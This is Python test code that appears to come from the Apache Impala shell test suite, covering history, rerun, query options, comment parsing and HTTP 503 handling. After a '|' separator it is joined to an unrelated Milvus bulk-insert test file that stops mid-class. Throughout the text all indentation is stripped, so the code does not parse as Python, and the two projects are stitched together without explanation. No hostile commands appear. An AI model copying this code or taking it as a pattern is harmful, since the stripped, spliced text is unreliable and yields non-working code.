The shell does not call close() for alter, use and drop queries, leaving them in
flight. This test issues those queries in interactive mode, and checks the debug
webpage to confirm that they've been closed.
TODO: Add every statement type.
"""
# IMPALA-10312: deflake the test by increasing timeout above the default
TIMEOUT_S = 30
# Disconnect existing clients so there are no open sessions.
self.close_impala_clients()
TMP_DB = 'inflight_test_db'
TMP_TBL = 'tmp_tbl'
MSG = '%s query should be closed'
NUM_QUERIES = 'impala-server.num-queries'
impalad = ImpaladService(socket.getfqdn())
self._wait_for_num_open_sessions(vector, impalad, 0,
"Open sessions found after closing all clients.")
p = ImpalaShell(vector)
try:
start_num_queries = impalad.get_metric_value(NUM_QUERIES)
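# Each statement sent below should bump the impala-server.num-queries metric by one,
# so the expected values are start + 2 after (create database, use), start + 4 after
# (create table, alter), and start + 5 after the drop.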
p.send_cmd('create database if not exists %s' % TMP_DB)
p.send_cmd('use %s' % TMP_DB)
impalad.wait_for_metric_value(NUM_QUERIES, start_num_queries + 2)
assert impalad.wait_for_num_in_flight_queries(0, TIMEOUT_S), MSG % 'use'
p.send_cmd('create table %s(i int)' % TMP_TBL)
p.send_cmd('alter table %s add columns (j int)' % TMP_TBL)
impalad.wait_for_metric_value(NUM_QUERIES, start_num_queries + 4)
assert impalad.wait_for_num_in_flight_queries(0, TIMEOUT_S), MSG % 'alter'
p.send_cmd('drop table %s' % TMP_TBL)
impalad.wait_for_metric_value(NUM_QUERIES, start_num_queries + 5)
assert impalad.wait_for_num_in_flight_queries(0, TIMEOUT_S), MSG % 'drop'
finally:
# get_result() must be called to exit the shell.
p.get_result()
self._wait_for_num_open_sessions(vector, impalad, 0,
"shell should close sessions.")
run_impala_shell_interactive(vector, "drop table if exists %s.%s;" % (
TMP_DB, TMP_TBL))
run_impala_shell_interactive(vector, "drop database if exists foo;")
self.create_impala_clients()
def test_multiline_queries_in_history(self, vector, tmp_history_file):
"""Test to ensure that multiline queries with comments are preserved in history
Ensure that multiline queries are preserved when they're read back from history.
Additionally, also test that comments are preserved.
"""
# readline gets its input from tty, so using stdin does not work.
child_proc = spawn_shell(get_shell_cmd(vector))
# List of (input query, expected text in output).
# The expected output is usually the same as the input with a number prefix, except
# where the shell strips newlines before a semicolon.
queries = [
("select\n1;--comment", "[1]: select\n1;--comment"),
("select 1 --comment\n;", "[2]: select 1 --comment;"),
("select 1 --comment\n\n\n;", "[3]: select 1 --comment;"),
("select /*comment*/\n1;", "[4]: select /*comment*/\n1;"),
("select\n/*comm\nent*/\n1;", "[5]: select\n/*comm\nent*/\n1;")]
for query, _ in queries:
child_proc.expect(PROMPT_REGEX)
child_proc.sendline(query)
child_proc.expect("Fetched 1 row\(s\) in [0-9]+\.?[0-9]*s")
child_proc.expect(PROMPT_REGEX)
child_proc.sendline('quit;')
child_proc.wait()
p = ImpalaShell(vector)
p.send_cmd('history')
result = p.get_result()
for _, history_entry in queries:
assert history_entry in result.stderr, "'%s' not in '%s'" % (history_entry,
result.stderr)
def test_history_does_not_duplicate_on_interrupt(self, vector, tmp_history_file):
"""This test verifies that once the cmdloop is broken the history file will not be
re-read. The cmdloop can be broken when the user sends a SIGINT or exceptions
occur."""
# readline gets its input from tty, so using stdin does not work.
shell_cmd = get_shell_cmd(vector)
child_proc = spawn_shell(shell_cmd)
# initialize history
child_proc.expect(PROMPT_REGEX)
child_proc.sendline("select 1;")
child_proc.expect("Fetched 1 row\(s\) in [0-9]+\.?[0-9]*s")
child_proc.expect(PROMPT_REGEX)
child_proc.sendline("quit;")
child_proc.wait()
# create a new shell and send SIGINT
child_proc = spawn_shell(shell_cmd)
child_proc.expect(PROMPT_REGEX)
child_proc.sendintr()
child_proc.expect("\^C")
child_proc.sendline("select 2;")
child_proc.expect("Fetched 1 row\(s\) in [0-9]+\.?[0-9]*s")
child_proc.expect(PROMPT_REGEX)
child_proc.sendline("quit;")
child_proc.wait()
# check history in a new shell instance
p = ImpalaShell(vector)
p.send_cmd('history')
result = p.get_result().stderr.splitlines()
assert "[1]: select 1;" == result[1]
assert "[2]: quit;" == result[2]
assert "[3]: select 2;" == result[3]
assert "[4]: quit;" == result[4]
def test_history_file_option(self, vector, tmp_history_file):
"""
Setting the 'tmp_history_file' fixture above means that the IMPALA_HISTFILE
environment will be overridden. Here we override that environment by passing
the --history_file command line option, ensuring that the history ends up
in the appropriate spot.
"""
with NamedTemporaryFile() as new_hist:
shell_cmd = get_shell_cmd(vector) + ["--history_file=%s" % new_hist.name]
child_proc = spawn_shell(shell_cmd)
child_proc.expect(":{0}] default>".format(get_impalad_port(vector)))
self._expect_with_cmd(child_proc, "select 'hi'", vector, ('hi'))
child_proc.sendline('exit;')
child_proc.expect(pexpect.EOF)
history_contents = open(new_hist.name).read()
assert "select 'hi'" in history_contents
def test_rerun(self, vector, tmp_history_file):
"""Smoke test for the 'rerun' command"""
child_proc = spawn_shell(get_shell_cmd(vector))
child_proc.expect(":{0}] default>".format(get_impalad_port(vector)))
self._expect_with_cmd(child_proc, "@1", vector, ("Command index out of range"))
self._expect_with_cmd(child_proc, "rerun -1", vector,
("Command index out of range"))
self._expect_with_cmd(child_proc, "select 'first_command'", vector,
("first_command"))
self._expect_with_cmd(child_proc, "rerun 1", vector, ("first_command"))
self._expect_with_cmd(child_proc, "@ -1", vector, ("first_command"))
self._expect_with_cmd(child_proc, "select 'second_command'", vector,
("second_command"))
child_proc.sendline('history;')
child_proc.expect(":{0}] default>".format(get_impalad_port(vector)))
assert '[1]: select \'first_command\';' in child_proc.before
assert '[2]: select \'second_command\';' in child_proc.before
assert '[3]: history;' in child_proc.before
# Rerunning command should not add an entry into history.
assert '[4]' not in child_proc.before
self._expect_with_cmd(child_proc, "@0", vector, ("Command index out of range"))
self._expect_with_cmd(child_proc, "rerun 4", vector, ("Command index out of range"))
self._expect_with_cmd(child_proc, "@-4", vector, ("Command index out of range"))
self._expect_with_cmd(child_proc, " @ 3 ", vector, ("second_command"))
self._expect_with_cmd(child_proc, "@-3", vector, ("first_command"))
self._expect_with_cmd(child_proc, "@", vector,
("Command index to be rerun must be an integer."))
self._expect_with_cmd(child_proc, "@1foo", vector,
("Command index to be rerun must be an integer."))
self._expect_with_cmd(child_proc, "@1 2", vector,
("Command index to be rerun must be an integer."))
self._expect_with_cmd(child_proc, "rerun1", vector, ("Syntax error"))
child_proc.sendline('quit;')
child_proc.wait()
def test_tip(self, vector):
"""Smoke test for the TIP command"""
# Temporarily add impala_shell module to path to get at TIPS list for verification
sys.path.append("%s/shell/" % os.environ['IMPALA_HOME'])
try:
import impala_shell
finally:
sys.path = sys.path[:-1]
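# The finally block pops the entry appended above so the temporary shell/ path does not
# leak into later tests; impala_shell.TIPS is only needed here to verify the printed tip.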
result = run_impala_shell_interactive(vector, "tip;")
for t in impala_shell.TIPS:
if t in result.stderr: return
assert False, "No tip found in output %s" % result.stderr
def test_var_substitution(self, vector):
cmds = open(os.path.join(QUERY_FILE_PATH, 'test_var_substitution.sql')).read()
args = ["--var=foo=123", "--var=BAR=456", "--delimited", "--output_delimiter= "]
result = run_impala_shell_interactive(vector, cmds, shell_args=args)
assert_var_substitution(result)
def test_query_option_configuration(self, vector):
rcfile_path = os.path.join(QUERY_FILE_PATH, 'impalarc_with_query_options')
args = ['-Q', 'MT_dop=1', '--query_option=MAX_ERRORS=200',
'--config_file=%s' % rcfile_path]
cmds = "set all;"
result = run_impala_shell_interactive(vector, cmds, shell_args=args)
assert "\tMT_DOP: 1" in result.stdout
assert "\tMAX_ERRORS: 200" in result.stdout
assert "\tEXPLAIN_LEVEL: 2" in result.stdout
assert "INVALID_QUERY_OPTION is not supported for the impalad being connected to, "\
"ignoring." in result.stdout
# Verify that query options under [impala] override those under [impala.query_options]
assert "\tDEFAULT_FILE_FORMAT: avro" in result.stdout
def test_commandline_flag_disable_live_progress(self, vector):
"""Test the command line flag disable_live_progress with live_progress."""
# By default, shell option live_progress is set to True in the interactive mode.
cmds = "set all;"
result = run_impala_shell_interactive(vector, cmds)
assert "\tLIVE_PROGRESS: True" in result.stdout
# override the default option through command line argument.
args = ['--disable_live_progress']
result = run_impala_shell_interactive(vector, cmds, shell_args=args)
assert "\tLIVE_PROGRESS: False" in result.stdout
# set live_progress as True with config file.
# override the option in config file through command line argument.
rcfile_path = os.path.join(QUERY_FILE_PATH, 'good_impalarc3')
args = ['--disable_live_progress', '--config_file=%s' % rcfile_path]
result = run_impala_shell_interactive(vector, cmds, shell_args=args)
assert "\tLIVE_PROGRESS: False" in result.stdout
def test_live_option_configuration(self, vector):
"""Test the optional configuration file with live_progress and live_summary."""
# Positive tests
# set live_summary and live_progress as True with config file
rcfile_path = os.path.join(QUERY_FILE_PATH, 'good_impalarc3')
cmd_line_args = ['--config_file=%s' % rcfile_path]
cmds = "set all;"
result = run_impala_shell_interactive(vector, cmds, shell_args=cmd_line_args)
assert 'WARNING:' not in result.stderr, \
"A valid config file should not trigger any warning: {0}".format(result.stderr)
assert "\tLIVE_SUMMARY: True" in result.stdout
assert "\tLIVE_PROGRESS: True" in result.stdout
# set live_summary and live_progress as False with config file
rcfile_path = os.path.join(QUERY_FILE_PATH, 'good_impalarc4')
args = ['--config_file=%s' % rcfile_path]
result = run_impala_shell_interactive(vector, cmds, shell_args=args)
assert 'WARNING:' not in result.stderr, \
"A valid config file should not trigger any warning: {0}".format(result.stderr)
assert "\tLIVE_SUMMARY: False" in result.stdout
assert "\tLIVE_PROGRESS: False" in result.stdout
# override options in config file through command line arguments
args = ['--live_progress', '--live_summary', '--config_file=%s' % rcfile_path]
result = run_impala_shell_interactive(vector, cmds, shell_args=args)
assert "\tLIVE_SUMMARY: True" in result.stdout
assert "\tLIVE_PROGRESS: True" in result.stdout
def test_source_file(self, vector):
cwd = os.getcwd()
try:
# Change working dir so that SOURCE command in shell.cmds can find shell2.cmds.
os.chdir("%s/tests/shell/" % os.environ['IMPALA_HOME'])
# IMPALA-5416: Test that a command following 'source' won't be run twice.
result = run_impala_shell_interactive(vector, "source shell.cmds;select \"second "
"command\";")
assert "Query: USE FUNCTIONAL" in result.stderr
assert "Query: SHOW TABLES" in result.stderr
assert "alltypes" in result.stdout
# This is from shell2.cmds, the result of sourcing a file from a sourced file.
assert "SELECT VERSION()" in result.stderr
assert "version()" in result.stdout
assert len(re.findall("'second command'", result.stdout)) == 1
# IMPALA-5416: Test that two source commands on a line won't crash the shell.
result = run_impala_shell_interactive(
vector, "source shell.cmds;source shell.cmds;")
assert len(re.findall("version\(\)", result.stdout)) == 2
finally:
os.chdir(cwd)
def test_source_file_with_errors(self, vector):
full_path = "%s/tests/shell/shell_error.cmds" % os.environ['IMPALA_HOME']
result = run_impala_shell_interactive(vector, "source %s;" % full_path)
assert "Could not execute command: USE UNKNOWN_DATABASE" in result.stderr
assert "Query: USE FUNCTIONAL" not in result.stderr
result = run_impala_shell_interactive(vector, "source %s;" % full_path, ['-c'])
assert "Could not execute command: USE UNKNOWN_DATABASE" in result.stderr,\
result.stderr
assert "Query: USE FUNCTIONAL" in result.stderr, result.stderr
assert "Query: SHOW TABLES" in result.stderr, result.stderr
assert "alltypes" in result.stdout, result.stdout
def test_source_missing_file(self, vector):
full_path = "%s/tests/shell/doesntexist.cmds" % os.environ['IMPALA_HOME']
result = run_impala_shell_interactive(vector, "source %s;" % full_path)
assert "No such file or directory" in result.stderr
def test_zero_row_fetch(self, vector):
# IMPALA-4418: DROP and USE are generally exceptional statements where
# the client does not fetch. For statements returning 0 rows we do not
# want an empty line in stdout.
result = run_impala_shell_interactive(vector, "-- foo \n use default;")
assert re.search('> \[', result.stdout)
result = run_impala_shell_interactive(vector,
"select * from functional.alltypes limit 0;")
assert "Fetched 0 row(s)" in result.stderr
assert re.search('> \[', result.stdout)
def test_set_and_set_all(self, vector):
"""IMPALA-2181. Tests the outputs of SET and SET ALL commands. SET should contain the
REGULAR and ADVANCED options only. SET ALL should contain all the options grouped by
display level."""
shell1 = ImpalaShell(vector)
shell1.send_cmd("set")
result = shell1.get_result()
assert "Query options (defaults shown in []):" in result.stdout
assert "ABORT_ON_ERROR" in result.stdout
assert "Advanced Query Options:" in result.stdout
assert "APPX_COUNT_DISTINCT" in result.stdout
assert vector.get_value("protocol") in ("hs2", "hs2-http")\
or "SUPPORT_START_OVER" in result.stdout
# Development, deprecated and removed options should not be shown.
# Note: there are currently no deprecated options
assert "Development Query Options:" not in result.stdout
assert "DEBUG_ACTION" not in result.stdout # Development option.
assert "MAX_IO_BUFFERS" not in result.stdout # Removed option.
shell2 = ImpalaShell(vector)
shell2.send_cmd("set all")
result = shell2.get_result()
assert "Query options (defaults shown in []):" in result.stdout
assert "Advanced Query Options:" in result.stdout
assert "Development Query Options:" in result.stdout
assert "Deprecated Query Options:" not in result.stdout
advanced_part_start_idx = result.stdout.find("Advanced Query Options")
development_part_start_idx = result.stdout.find("Development Query Options")
deprecated_part_start_idx = result.stdout.find("Deprecated Query Options")
advanced_part = result.stdout[advanced_part_start_idx:development_part_start_idx]
development_part = result.stdout[development_part_start_idx:deprecated_part_start_idx]
assert "ABORT_ON_ERROR" in result.stdout[:advanced_part_start_idx]
assert "APPX_COUNT_DISTINCT" in advanced_part
assert vector.get_value("protocol") in ("hs2", "hs2-http")\
or "SUPPORT_START_OVER" in advanced_part
assert "DEBUG_ACTION" in development_part
# Removed options should not be shown.
assert "MAX_IO_BUFFERS" not in result.stdout
def check_command_case_sensitivity(self, vector, command, expected):
shell = ImpalaShell(vector)
shell.send_cmd(command)
assert expected in shell.get_result().stderr
def test_unexpected_conversion_for_literal_string_to_lowercase(self, vector):
# IMPALA-4664: Impala shell can accidentally convert certain literal
# strings to lowercase. Impala shell splits each command into tokens
# and then converts the first token to lowercase to figure out how it
# should execute the command. The splitting is done by spaces only.
# Thus, if the user types a TAB after the SELECT, the first token after
# the split becomes the SELECT plus whatever comes after it.
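# A minimal illustration (not the shell's actual parsing code): with a space-only split,
#   "select\t'FOO'".split(' ')[0]
# is the whole string, so lowercasing that "first token" would also lowercase the quoted
# literal. The queries below check the literal survives a space, a tab and a newline.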
result = run_impala_shell_interactive(vector, "select'MUST_HAVE_UPPER_STRING'")
assert re.search('MUST_HAVE_UPPER_STRING', result.stdout)
result = run_impala_shell_interactive(vector, "select\t'MUST_HAVE_UPPER_STRING'")
assert re.search('MUST_HAVE_UPPER_STRING', result.stdout)
result = run_impala_shell_interactive(vector, "select\n'MUST_HAVE_UPPER_STRING'")
assert re.search('MUST_HAVE_UPPER_STRING', result.stdout)
def test_case_sensitive_command(self, vector):
# IMPALA-2640: Make a given command case-sensitive
cwd = os.getcwd()
try:
self.check_command_case_sensitivity(vector, "sElEcT VERSION()", "Query: sElEcT")
self.check_command_case_sensitivity(vector, "sEt VaR:FoO=bOo", "Variable FOO")
self.check_command_case_sensitivity(vector, "sHoW tables", "Query: sHoW")
# Change working dir so that SOURCE command in shell_case_sensitive.cmds can
# find shell_case_sensitive2.cmds.
os.chdir("%s/tests/shell/" % os.environ['IMPALA_HOME'])
result = run_impala_shell_interactive(vector,
"sOuRcE shell_case_sensitive.cmds; SeLeCt 'second command'")
print(result.stderr)
assert "Query: uSe FUNCTIONAL" in result.stderr
assert "Query: ShOw TABLES" in result.stderr
assert "alltypes" in result.stdout
# This is from shell_case_sensitive2.cmds, the result of sourcing a file
# from a sourced file.
print(result.stderr)
assert "SeLeCt 'second command'" in result.stderr
finally:
os.chdir(cwd)
def test_line_with_leading_comment(self, vector, unique_database):
# IMPALA-2195: A line with a comment produces incorrect command.
table = "{0}.leading_comment".format(unique_database)
run_impala_shell_interactive(vector, 'create table {0} (i int);'.format(table))
result = run_impala_shell_interactive(vector, '-- comment\n'
'insert into {0} values(1);'.format(table))
assert 'Modified 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '-- comment\n'
'select * from {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '--한글\n'
'select * from {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '/* 한글 */\n'
'select * from {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '/* comment */\n'
'select * from {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '/* comment1 */\n'
'-- comment2\n'
'select * from {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '/* comment1\n'
'comment2 */ select * from {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '/* select * from {0} */ '
'select * from {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '/* comment */ help use')
assert 'Executes a USE... query' in result.stdout
result = run_impala_shell_interactive(vector, '-- comment\n'
' help use;')
assert 'Executes a USE... query' in result.stdout
result = run_impala_shell_interactive(vector, '/* comment1 */\n'
'-- comment2\n'
'desc {0};'.format(table))
assert 'Fetched 1 row(s)' in result.stderr
result = run_impala_shell_interactive(vector, '/* comment1 */\n'
'-- comment2\n'
'help use;')
assert 'Executes a USE... query' in result.stdout
def test_line_ends_with_comment(self, vector):
# IMPALA-5269: Test lines that end with a comment.
queries = ['select 1 + 1; --comment',
'select 1 + 1 --comment\n;']
for query in queries:
result = run_impala_shell_interactive(vector, query)
assert '| 1 + 1 |' in result.stdout
assert '| 2 |' in result.stdout
queries = ['select \'some string\'; --comment',
'select \'some string\' --comment\n;']
for query in queries:
result = run_impala_shell_interactive(vector, query)
assert '| \'some string\' |' in result.stdout
assert '| some string |' in result.stdout
queries = ['select "--"; -- "--"',
'select \'--\'; -- "--"',
'select "--" -- "--"\n;',
'select \'--\' -- "--"\n;']
for query in queries:
result = run_impala_shell_interactive(vector, query)
assert '| \'--\' |' in result.stdout
assert '| -- |' in result.stdout
query = ('select * from (\n' +
'select count(*) from functional.alltypes\n' +
') v; -- Incomplete SQL statement in this line')
result = run_impala_shell_interactive(vector, query)
assert '| count(*) |' in result.stdout
query = ('select id from functional.alltypes\n' +
'order by id; /*\n' +
'* Multi-line comment\n' +
'*/')
result = run_impala_shell_interactive(vector, query)
assert '| id |' in result.stdout
def test_fix_infinite_loop(self, vector):
# IMPALA-6337: Fix infinite loop.
# In case of TL;DR:
# - see IMPALA-9362 for details
# - see tests/shell/util.py for explanation of IMPALA_SHELL_EXECUTABLE
if os.getenv("IMPALA_HOME") not in IMPALA_SHELL_EXECUTABLE:
# The fix for IMPALA-6337 involved patching our internal version of
# sqlparse 0.1.19 in ${IMPALA_HOME}/shell/ext-py. However, when we
# create the stand-alone python package of the impala-shell for PyPI,
# we don't include the bundled 3rd party libs -- we expect users to
# install 3rd party libraries from upstream PyPI.
#
# We could try to bundle sqlparse with the PyPI package, but there we
# run into the issue that our bundled version is not python 3
# compatible. The real fix for this would be to upgrade to sqlparse 0.3.0,
# but that's not without complications. See IMPALA-9362 for details.
#
# For the time being, what this means is that IMPALA-6337 is fixed for
# people who are running the shell locally from any host/node that's part
# of a cluster where Impala is installed, but if they are running a
# standalone version of the shell on a client outside of a cluster, then
# they will still be relying on the upstream version of sqlparse 0.1.19,
# and so they may still be affected by IMPALA-6337.
#
pytest.skip("Test will fail if shell is not part of dev environment.")
result = run_impala_shell_interactive(vector, "select 1 + 1; \"\n;\";")
assert '| 2 |' in result.stdout
result = run_impala_shell_interactive(vector, "select '1234'\";\n;\n\";")
assert '| 1234 |' in result.stdout
result = run_impala_shell_interactive(vector, "select 1 + 1; \"\n;\"\n;")
assert '| 2 |' in result.stdout
result = run_impala_shell_interactive(vector, "select '1\\'23\\'4'\";\n;\n\";")
assert '| 1\'23\'4 |' in result.stdout
result = run_impala_shell_interactive(vector, "select '1\"23\"4'\";\n;\n\";")
assert '| 1"23"4 |' in result.stdout
def test_comment_with_quotes(self, vector):
# IMPALA-2751: Comment does not need to have matching quotes
queries = [
"select -- '\n1;",
'select -- "\n1;',
"select -- \"'\n 1;",
"select /*'\n*/ 1;",
'select /*"\n*/ 1;',
"select /*\"'\n*/ 1;",
"with a as (\nselect 1\n-- '\n) select * from a",
'with a as (\nselect 1\n-- "\n) select * from a',
"with a as (\nselect 1\n-- '\"\n) select * from a",
]
for query in queries:
result = run_impala_shell_interactive(vector, query)
assert '| 1 |' in result.stdout
def test_shell_prompt(self, vector):
shell_cmd = get_shell_cmd(vector)
proc = spawn_shell(shell_cmd)
proc.expect(":{0}] default>".format(get_impalad_port(vector)))
self._expect_with_cmd(proc, "use foo", vector, (), 'default')
self._expect_with_cmd(proc, "use functional", vector, (), 'functional')
self._expect_with_cmd(proc, "use foo", vector, (), 'functional')
self._expect_with_cmd(proc, 'use `tpch`', vector, (), 'tpch')
self._expect_with_cmd(proc, 'use ` tpch `', vector, (), 'tpch')
proc = spawn_shell(shell_cmd + ['-d', 'functional'])
proc.expect(":{0}] functional>".format(get_impalad_port(vector)))
self._expect_with_cmd(proc, "use foo", vector, (), 'functional')
self._expect_with_cmd(proc, "use tpch", vector, (), 'tpch')
self._expect_with_cmd(proc, "use foo", vector, (), 'tpch')
proc = spawn_shell(shell_cmd + ['-d', ' functional '])
proc.expect(":{0}] functional>".format(get_impalad_port(vector)))
proc = spawn_shell(shell_cmd + ['-d', '` functional `'])
proc.expect(":{0}] functional>".format(get_impalad_port(vector)))
# Start an Impala shell with an invalid DB.
proc = spawn_shell(shell_cmd + ['-d', 'foo'])
proc.expect(":{0}] default>".format(get_impalad_port(vector)))
self._expect_with_cmd(proc, "use foo", vector, (), 'default')
self._expect_with_cmd(proc, "use functional", vector, (), 'functional')
self._expect_with_cmd(proc, "use foo", vector, (), 'functional')
proc.sendeof()
proc.wait()
def test_strip_leading_comment(self, vector):
"""Test stripping leading comments from SQL statements"""
assert ('--delete\n', 'select 1') == \
ImpalaShellClass.strip_leading_comment('--delete\nselect 1')
assert ('--delete\n', 'select --do not delete\n1') == \
ImpalaShellClass.strip_leading_comment('--delete\nselect --do not delete\n1')
assert (None, 'select --do not delete\n1') == \
ImpalaShellClass.strip_leading_comment('select --do not delete\n1')
assert ('/*delete*/\n', 'select 1') == \
ImpalaShellClass.strip_leading_comment('/*delete*/\nselect 1')
assert ('/*delete\nme*/\n', 'select 1') == \
ImpalaShellClass.strip_leading_comment('/*delete\nme*/\nselect 1')
assert ('/*delete\nme*/\n', 'select 1') == \
ImpalaShellClass.strip_leading_comment('/*delete\nme*/\nselect 1')
assert ('/*delete*/', 'select 1') == \
ImpalaShellClass.strip_leading_comment('/*delete*/select 1')
assert ('/*delete*/ ', 'select /*do not delete*/ 1') == \
ImpalaShellClass.strip_leading_comment('/*delete*/ select /*do not delete*/ 1')
assert ('/*delete1*/ \n/*delete2*/ \n--delete3 \n', 'select /*do not delete*/ 1') == \
ImpalaShellClass.strip_leading_comment('/*delete1*/ \n'
'/*delete2*/ \n'
'--delete3 \n'
'select /*do not delete*/ 1')
assert (None, 'select /*do not delete*/ 1') == \
ImpalaShellClass.strip_leading_comment('select /*do not delete*/ 1')
assert ('/*delete*/\n', 'select c1 from\n'
'a\n'
'join -- +SHUFFLE\n'
'b') == \
ImpalaShellClass.strip_leading_comment('/*delete*/\n'
'select c1 from\n'
'a\n'
'join -- +SHUFFLE\n'
'b')
assert ('/*delete*/\n', 'select c1 from\n'
'a\n'
'join /* +SHUFFLE */\n'
'b') == \
ImpalaShellClass.strip_leading_comment('/*delete*/\n'
'select c1 from\n'
'a\n'
'join /* +SHUFFLE */\n'
'b')
assert (None, 'select 1') == \
ImpalaShellClass.strip_leading_comment('select 1')
def test_malformed_query(self, vector):
"""Test the handling of malformed query without closing quotation"""
shell = ImpalaShell(vector)
query = "with v as (select 1) \nselect foo('\\\\'), ('bar \n;"
shell.send_cmd(query)
result = shell.get_result()
assert "ERROR: ParseException: Unmatched string literal" in result.stderr,\
result.stderr
def test_timezone_validation(self, vector):
"""Test that query option TIMEZONE is validated when executing a query.
Query options are not sent to the coordinator immediately, so the error checking
will only happen when running a query.
"""
p = ImpalaShell(vector)
p.send_cmd('set timezone=BLA;')
p.send_cmd('select 1;')
results = p.get_result()
assert "Fetched 1 row" not in results.stderr
# assert "ERROR: Errors parsing query options" in results.stderr, results.stderr
assert "Invalid timezone name 'BLA'" in results.stderr, results.stderr
def test_with_clause(self, vector):
# IMPALA-7939: Fix issue where CTE that contains "insert", "upsert", "update", or
# "delete" is categorized as a DML statement.
for keyword in ["insert", "upsert", "update", "delete", "\\'insert\\'",
"\\'upsert\\'", "\\'update\\'", "\\'delete\\'"]:
p = ImpalaShell(vector)
cmd = ("with foo as "
"(select * from functional.alltypestiny where string_col='%s') "
"select * from foo limit 1" % keyword)
p.send_cmd(cmd)
result = p.get_result()
assert "Fetched 0 row" in result.stderr
def test_quotes_in_with_clause(self, vector):
# IMPALA-10051: This test verifies that the fix prevents ValueErrors caused by
# shlex library when quotes and whitespace characters are mixed.
p = ImpalaShell(vector)
cmd = ("with foo as "
"(select *, regexp_replace(string_col,\"[a-zA-Z]\",\"+ \") "
"from functional.alltypestiny) "
"select * from foo limit 1")
p.send_cmd(cmd)
result = p.get_result()
assert "Fetched 1 row" in result.stderr
def test_http_interactions(self, vector, http_503_server):
"""Test interactions with the http server when using hs2-http protocol.
Check that the shell prints a good message when the server returns a 503 error."""
protocol = vector.get_value("protocol")
if protocol != 'hs2-http':
pytest.skip()
# Check that we get a message about the 503 error when we try to connect.
shell_args = ["--protocol={0}".format(protocol),
"-i{0}:{1}".format(http_503_server.HOST, http_503_server.PORT)]
shell_proc = spawn_shell([IMPALA_SHELL_EXECUTABLE] + shell_args)
shell_proc.expect("HTTP code 503", timeout=10)
def test_http_interactions_extra(self, vector, http_503_server_extra):
"""Test interactions with the http server when using hs2-http protocol.
Check that the shell prints a good message when the server returns a 503 error,
including the body text from the message."""
protocol = vector.get_value("protocol")
if protocol != 'hs2-http':
pytest.skip()
# Check that we get a message about the 503 error when we try to connect.
shell_args = ["--protocol={0}".format(protocol),
"-i{0}:{1}".format(http_503_server_extra.HOST,
http_503_server_extra.PORT)]
shell_proc = spawn_shell([IMPALA_SHELL_EXECUTABLE] + shell_args)
shell_proc.expect("HTTP code 503: Service Unavailable \[EXTRA\]", timeout=10)
def run_impala_shell_interactive(vector, input_lines, shell_args=None,
wait_until_connected=True):
"""Runs a command in the Impala shell interactively."""
# If the "input_lines" argument is a string, wrap it in a single-element list.
if type(input_lines) is str:
input_lines = [input_lines]
# workaround to make Popen environment 'utf-8' compatible
# since piping defaults to ascii
my_env = os.environ
my_env['PYTHONIOENCODING'] = 'utf-8'
p = ImpalaShell(vector, args=shell_args, env=my_env,
wait_until_connected=wait_until_connected)
for line in input_lines:
p.send_cmd(line)
return p.get_result()
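# Example usage (hypothetical statement; shell_args and wait_until_connected are optional):
#   result = run_impala_shell_interactive(vector, "select 1;")
#   assert "Fetched 1 row" in result.stderr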
|
test_bulk_insert.py | import pytest
from tests.utils import *
from tests.constants import *
ADD_TIMEOUT = 600
uid = "test_insert"
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": 10, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
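# Note: the query above follows the pre-2.0 Milvus search DSL -- a "bool"/"must" wrapper
# around a "vector" clause keyed by the vector field name, carrying topk, the query
# vectors, the metric type and index-specific search params (here "nprobe" for IVF).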
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("CPU not support index_type: ivf_sq8h")
return request.param
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
def test_add_vector_with_empty_vector(self, connect, collection):
'''
target: test add vectors with empty vectors list
method: set empty vectors list as add method params
expected: raises an Exception
'''
vector = []
with pytest.raises(Exception) as e:
status, ids = connect.bulk_insert(collection, vector)
def test_add_vector_with_None(self, connect, collection):
'''
target: test add vectors with None
method: set None as add method params
expected: raises an Exception
'''
vector = None
with pytest.raises(Exception) as e:
status, ids = connect.bulk_insert(collection, vector)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_collection_not_existed(self, connect):
'''
target: test insert, with collection not existed
method: insert entity into a random named collection
expected: error raised
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.bulk_insert(collection_name, default_entities)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
'''
target: test delete collection after insert vector
method: insert vector and delete collection
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entity)
assert len(ids) == 1
connect.drop_collection(collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_sleep_drop_collection(self, connect, collection):
'''
target: test delete collection after insert vector for a while
method: insert vector, sleep, and delete collection
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entity)
assert len(ids) == 1
connect.flush([collection])
connect.drop_collection(collection)
@pytest.mark.skip("create index")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
'''
target: test building index after inserting vectors
method: insert vectors and build index
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
info = connect.describe_collection(collection)
fields = info["fields"]
for field in fields:
if field["name"] == field_name:
assert field["indexes"][0] == get_simple_index
@pytest.mark.skip("create index")
@pytest.mark.timeout(ADD_TIMEOUT)
